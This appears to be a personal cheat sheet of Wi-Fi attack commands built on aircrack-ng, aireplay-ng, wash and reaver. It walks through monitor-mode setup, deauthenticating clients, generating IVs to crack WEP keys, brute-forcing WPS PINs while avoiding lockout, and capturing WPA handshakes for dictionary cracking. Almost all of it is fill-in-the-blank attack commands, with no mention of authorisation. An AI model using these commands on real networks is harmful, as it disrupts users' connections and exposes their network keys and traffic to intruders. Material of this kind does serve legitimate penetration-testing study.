Wireless

airodump-ng

Scanning

• adapter must be in monitor mode

  • ifconfig wlan0 down

  • sometimes need airodump-ng check kill

  • iwconfig mode monitor

  • ifconfig wlan0 up

• to sniff 5g, use --band abg (or whatever specific band you are looking for)

• airodump-ng --band abg mon0 (mon0 is new interface name for monitor mode adapter)

• --bssid [BSSID]

• --channel [channel]

• --write [filename]

Deauthentication

• disconnect a client from the networks

• aireplay-ng --deauth [# of packets (large if you want to just dc)] -a [ap mac address] -c [victim mac address] mon0

• airodump-ng may need to be running at the time the command is executed

WEP

• run a specific airodump scan

• Need a high number of Data packets (IVs) to easily crack the key. Busier networks mean more data packets

  • if we don't have much traffic on the network, we can use fake auth packets to force the AP to generate IVs

  • associate to the network

    • aireplay-ng --fakeauth 0 -a [AP BSSID] -h [my mac address] mon0

  • arp replay

    • aireplay-ng --arpreplay -b [AP BSSID] -h [my mac address] mon0

    • wait for packets to fly

• aircrack-ng [filename].cap

• can use ascii or key with colons removed to connect to network

WPA/WPA2

• WPS

  • discover WPS enabled devices

    • wash --interface mon0

  • brute with reaver

    • reaver --bssid [AP mac address] --channel [network channel] --interface mon0 -vvv --no-associate

    • if send_packet bug, revert to older version of reaver

  • associate to network

    • aireplay-ng --fakeauth 30 -a [AP BSSID] -h [my mac address] mon0

      • we're increasing the timeout to 30 between association attempts so we don't get locked out

• Standard

  • run a specific airodump scan

  • wait for handshake to be captured or use short deauth attack (send 4 deauth packets)

  • run a dictionary attack with file containing handshake

    • aircrack-ng [filename].cap -w [wordlist]